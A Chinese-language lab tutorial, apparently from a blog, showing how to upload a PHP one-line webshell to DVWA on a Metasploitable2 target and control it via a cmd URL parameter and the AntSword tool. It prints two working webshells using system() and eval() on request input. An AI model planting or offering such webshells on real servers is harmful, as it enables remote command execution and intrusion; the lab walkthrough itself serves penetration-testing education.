当前位置: 首页 > news >正文

php一句话木马(+蚁剑)

一.php一句话木马

一句话木马是一种极简的WebShell,常用于渗透测试中远程执行代码。它通常通过文件上传、代码注入等方式植入目标服务器。

二.实验环境(在同一局域网中)

靶机为Mstasploitable2-linux的DVWA

攻击方为kali,windows

三.构造shell.php

可以直接在桌面上创建文档

写入代码,新建文件shell.php

<?php system($_REQUEST ['cmd']);?>

四.主机查看IP,nmap

五.文件上传

得到靶机IP后,用火狐浏览器登录DVWA

http://靶机ip/dvwa/login.php

登录账号密码为:admin,password

到文件上传窗口

然后知道shell.php在服务器中的位置

六.远程控制

访问路径

http://靶机ip/dvwa/hackable/uploads/shell.php?cmd=ls

七.蚁剑控制

如果要用蚁剑控制的话,得把一句话木马改掉

改完后重新上传文件

<?php @eval($_REQUEST ['cmd']);?>

测试连接,连接成功后保存,可以进行操作了

http://www.gsyq.cn/news/161145.html

相关文章:

  • 百度ERNIE 4.5重磅发布:300B参数大模型来了!
  • 利用PaddlePaddle镜像快速实现工业级目标检测(PaddleDetection)
  • Google发布300M EmbeddingGemma:移动端也能跑的AI嵌入模型
  • Switch变身全能娱乐站:wiliwili大屏B站体验全解析
  • 2025年热门的快充家用吸尘器/家用吸尘器厂家推荐与选购指南 - 行业平台推荐
  • 开源工业监控平台:解决传统SCADA系统的成本与技术困局
  • AI绘图新工具:让人物秒变真人的LoRA模型
  • 老旧Mac升级终极配置指南:OpenCore完整解决方案
  • PaddleDetection实战:用PaddlePaddle镜像完成YOLOv3目标检测
  • C++】透视C++多态:从虚函数表到底层内存布局的完全拆解
  • GLM-4.5-Air-Base开放!120亿参数AI模型免费商用
  • 实战案例引导:搭建首个USB3.0通信环境(新手适用)
  • AirPodsDesktop:Windows平台AirPods功能增强解决方案
  • LFM2-2.6B:边缘AI新标杆,速度提升3倍的轻量模型
  • AMD硬件调试的革命性突破:如何用3个创新方法重新定义性能优化?
  • 如何快速掌握微信小程序二维码生成:weapp-qrcode终极完整指南
  • Topit窗口置顶:终极macOS多任务效率解决方案
  • GLM-Edge-4B-Chat:轻量级AI对话模型如何部署终端?
  • Qwen3-8B强力升级:36万亿token打造32K上下文AI模型
  • Zotero-Style插件终极配置指南:提升文献管理效率的完整方案
  • DeepLX:免费DeepL翻译API的终极替代方案
  • 终极解决方案:ZXPInstaller让Adobe扩展安装变得简单快捷
  • webdriver_manager终极指南:彻底解决Selenium浏览器驱动管理难题
  • Onekey:轻松获取Steam游戏清单的完整解决方案
  • Cowabunga Lite深度解析:iOS 15+系统个性化定制的终极方案
  • 如何快速掌握AMD平台调试:终极SMUDebugTool使用指南
  • UAssetGUI入门指南:5步掌握虚幻引擎资产编辑神器
  • Beyond Compare 5授权解决方案:本地密钥生成技术详解
  • Python CAD自动化终极指南:如何用ezdxf库快速处理DXF图纸
  • MelonLoader终极安装指南:5分钟从零到精通